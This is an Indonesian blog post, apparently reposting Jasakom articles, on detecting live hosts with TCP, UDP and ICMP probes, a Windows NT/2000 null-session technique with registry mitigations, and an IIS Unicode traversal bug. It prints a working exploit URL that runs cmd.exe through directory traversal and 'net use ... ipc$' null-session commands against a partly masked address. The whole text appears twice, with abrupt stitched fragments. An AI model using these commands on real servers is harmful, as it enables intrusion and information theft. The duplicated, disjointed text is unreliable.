Jasakom - Bagaimana kita mengetahui apakah suatu host online di internet ? LAN ? WAN ? secara mudahkita dapat menggunakan program ping. Namun dewasa ini banyak router/firewall yang dikonfigurasi untuk memfilter paket ICMP echo request, sehingga program ping tidak bisa kita gunakan untuk mendeteksi keberadaan suatu host.
Disini penulis akan memberikan beberapa teknik yang bisa digunakan untuk
mengetes apakah suatu host online atau tidak.
UDP
Secara default host akan mengirimkan ICMP_PORT_UNREACHABLE jika suatu paket data UDP dikirimkan ke port yang tidak dibuka. Dengan begitu kita dapat mengetahui apakah suatu host online atau tidak. Anda bisa menggunakan program traceroute !!.
TCP->SYN
Setiap host akan me-replay paket yang dikirimkan baik pada port yang terbuka ataupun tidak. Jika paket data dikirim ke ke port yang terpakai host akan me
replay dengan SYN|ACK flag di set, sebaliknya akan di set RST|ACK. Jika tidak ada paket yang dikirim kita dapat mengasumsikan bahwa target host dipasangi firewall, atau port di filter.
TCP->SYN|FIN
Seperti halnya TCP->SYN ketika suatu port menerima paket dengan flags ini diset ia akan mengirim replay dengan flags SYN, FIN, ACK diset. sebaliknya pada port yang ditutup RST|ACK akan dikirimkan.
TCP->ACK
Dengan mengeset bit ACK pada TCP dan mengirimkannya ke target host baik pada
port yang terbuka/tertutup flag RST akan diset pada paket replay.
TCP->FIN
Port yang tetutup akan mengirimkan RST|ACK sedang port yang terbuka tidak akan mengirimkan replay.
ICMP->13
Ketika paket ICMP dengan type 13 (Timestamp Request) dikirimkan ke host target,jika host tersebut online ia akan menjawab dengan ICMP no 14 (Timestamp Reply).
IP->IP_PROTO = 0;
Teknik terakhir yang dibahas disini adalah dengan mengirimkan paket IP dengan protokol yang tidak dipakai. Jika target host menerima paket ini ia akan mengirimkan pemberitahuan ke pengirim berupa ICMP protokol unreachable.
Perlu diperhatikan bahwa tidak semua sistem operasi akan mereplay tiap paket
diatas. Anda bisa juga menambahkan teknik lain dengan berbagai kombinasi flags pada TCP, ataupun setting pada IP header.
References
* whitepaper by dethy dethy@synnergy.net "Advanced Host Detection"
bug unicode
Bug yang digunakanpun tetap merupakan bug lama yaitu unicode yang ditemukan oleh Georgi Guninski kira-kira setahun silam yang tetap menjadi bug favorit untuk digunakan dalam deface web site.
Adapun exploit code untuk unicode ini adalah sebagai berikut :
http://www.jasakom.com/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+d:\
Mecegah dan Mengambil Informasi Berharga Tentang Server Melalui Internet
Jasakom - Pada suatu jaringan, adalah sepantasnya bagi sang Administrator untuk mempertahankan semua informasi serahasia mungkin. Informasi yang sedikit apapun pada akhirnya bisa menjadi informasi yang sangat berbahaya pada akhirnya, tergantung anda bagaimana mengelolanya.
Salah satu masalah pada Windows NT 4 adalah masalah Null Connection yang pernah saya bahas pada artikel kelemahan salah satu bank di Indonesia yang pada akhirnya memungkinkan kita yang memasukinya. Null connection adalah koneksi yang bisa dilakukan tanpa kita perlu mengetahui user name maupun password sehingga anda bisa melakukannya dengan mudahnya :
D:\>net use \\202.155.6.16X\ipc$ "" /user:""
The command completed successfully.
Apa yang bisa anda ketahui setelah melalui tahap ini adalah cukup banyak seperti nama semua user, kapan mereka melakukan logint terakhir, group yang dimiliki oleh masing-masing user, dll tanpa anda perlu mengetahui informasi apapun sebelumnya dari jaringan tersebut selain nomor IP !.. Contohnya jika anda ingin mengetahui direktory yang dishare oleh server tersebut anda tinggal mengetikkan perintah :
D:\>net view \\202.155.6.16X
Shared resources at \\202.155.6.16X
Share name Type Used as Comment
-------------------------------------------------------------------------------
mspclnt Disk
temp Disk
The command completed successfully.
D:\>
Ok, masalah ini memang telah cukup lama tapi tampaknya microsoft tetap memasukkannya secara default pada windows 2000 sehingga masalah tetap muncul walaupun anda telah menginstall SP terbaru, hotfix terbaru dan Windows terbaru.;)
Untuk mencegah masalah ini muncul pada jaringan anda di NT 4, anda bisa menambahkan value type REG_DWORLD dengan nilai 1 dengan nama "RestrictAnonymous" melalui registry :
HKLM\SYSTEM\CurrentControlSet\Control\LSA
Cara lain adalah dengan melakukan unbind protokol netbios pada ethernet card sehingga masalah null connection ini tidak memberikan lagi informasi-informasi jaringan kepada publik.
Masalah pada null connection ini ternyata tidak cuman menghinggapi NT 4, dimana windows 2000 pun mengalami hal yang sama secara default. Pada windows 2000 seperti pada contoh yang telah diberikan diatas, anda bisa juga menghindarinya dengan cara yang lebih mudah tanpa harus mengedit registry. Gunakan Local Security Setting dengan mengeset Additional restriction for anonymous connections ke "No access without explicit anonymous permissions" yang setara dengan mengeset registry key "RestrictAnonymous" ke angka 2.
Disini penulis akan memberikan beberapa teknik yang bisa digunakan untuk
mengetes apakah suatu host online atau tidak.
UDP
Secara default host akan mengirimkan ICMP_PORT_UNREACHABLE jika suatu paket data UDP dikirimkan ke port yang tidak dibuka. Dengan begitu kita dapat mengetahui apakah suatu host online atau tidak. Anda bisa menggunakan program traceroute !!.
TCP->SYN
Setiap host akan me-replay paket yang dikirimkan baik pada port yang terbuka ataupun tidak. Jika paket data dikirim ke ke port yang terpakai host akan me
replay dengan SYN|ACK flag di set, sebaliknya akan di set RST|ACK. Jika tidak ada paket yang dikirim kita dapat mengasumsikan bahwa target host dipasangi firewall, atau port di filter.
TCP->SYN|FIN
Seperti halnya TCP->SYN ketika suatu port menerima paket dengan flags ini diset ia akan mengirim replay dengan flags SYN, FIN, ACK diset. sebaliknya pada port yang ditutup RST|ACK akan dikirimkan.
TCP->ACK
Dengan mengeset bit ACK pada TCP dan mengirimkannya ke target host baik pada
port yang terbuka/tertutup flag RST akan diset pada paket replay.
TCP->FIN
Port yang tetutup akan mengirimkan RST|ACK sedang port yang terbuka tidak akan mengirimkan replay.
ICMP->13
Ketika paket ICMP dengan type 13 (Timestamp Request) dikirimkan ke host target,jika host tersebut online ia akan menjawab dengan ICMP no 14 (Timestamp Reply).
IP->IP_PROTO = 0;
Teknik terakhir yang dibahas disini adalah dengan mengirimkan paket IP dengan protokol yang tidak dipakai. Jika target host menerima paket ini ia akan mengirimkan pemberitahuan ke pengirim berupa ICMP protokol unreachable.
Perlu diperhatikan bahwa tidak semua sistem operasi akan mereplay tiap paket
diatas. Anda bisa juga menambahkan teknik lain dengan berbagai kombinasi flags pada TCP, ataupun setting pada IP header.
References
* whitepaper by dethy dethy@synnergy.net "Advanced Host Detection"
bug unicode
Bug yang digunakanpun tetap merupakan bug lama yaitu unicode yang ditemukan oleh Georgi Guninski kira-kira setahun silam yang tetap menjadi bug favorit untuk digunakan dalam deface web site.
Adapun exploit code untuk unicode ini adalah sebagai berikut :
http://www.jasakom.com/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir+d:\
Mecegah dan Mengambil Informasi Berharga Tentang Server Melalui Internet
Jasakom - Pada suatu jaringan, adalah sepantasnya bagi sang Administrator untuk mempertahankan semua informasi serahasia mungkin. Informasi yang sedikit apapun pada akhirnya bisa menjadi informasi yang sangat berbahaya pada akhirnya, tergantung anda bagaimana mengelolanya.
Salah satu masalah pada Windows NT 4 adalah masalah Null Connection yang pernah saya bahas pada artikel kelemahan salah satu bank di Indonesia yang pada akhirnya memungkinkan kita yang memasukinya. Null connection adalah koneksi yang bisa dilakukan tanpa kita perlu mengetahui user name maupun password sehingga anda bisa melakukannya dengan mudahnya :
D:\>net use \\202.155.6.16X\ipc$ "" /user:""
The command completed successfully.
Apa yang bisa anda ketahui setelah melalui tahap ini adalah cukup banyak seperti nama semua user, kapan mereka melakukan logint terakhir, group yang dimiliki oleh masing-masing user, dll tanpa anda perlu mengetahui informasi apapun sebelumnya dari jaringan tersebut selain nomor IP !.. Contohnya jika anda ingin mengetahui direktory yang dishare oleh server tersebut anda tinggal mengetikkan perintah :
D:\>net view \\202.155.6.16X
Shared resources at \\202.155.6.16X
Share name Type Used as Comment
-------------------------------------------------------------------------------
mspclnt Disk
temp Disk
The command completed successfully.
D:\>
Ok, masalah ini memang telah cukup lama tapi tampaknya microsoft tetap memasukkannya secara default pada windows 2000 sehingga masalah tetap muncul walaupun anda telah menginstall SP terbaru, hotfix terbaru dan Windows terbaru.;)
Untuk mencegah masalah ini muncul pada jaringan anda di NT 4, anda bisa menambahkan value type REG_DWORLD dengan nilai 1 dengan nama "RestrictAnonymous" melalui registry :
HKLM\SYSTEM\CurrentControlSet\Control\LSA
Cara lain adalah dengan melakukan unbind protokol netbios pada ethernet card sehingga masalah null connection ini tidak memberikan lagi informasi-informasi jaringan kepada publik.
Masalah pada null connection ini ternyata tidak cuman menghinggapi NT 4, dimana windows 2000 pun mengalami hal yang sama secara default. Pada windows 2000 seperti pada contoh yang telah diberikan diatas, anda bisa juga menghindarinya dengan cara yang lebih mudah tanpa harus mengedit registry. Gunakan Local Security Setting dengan mengeset Additional restriction for anonymous connections ke "No access without explicit anonymous permissions" yang setara dengan mengeset registry key "RestrictAnonymous" ke angka 2.
No comments:
Post a Comment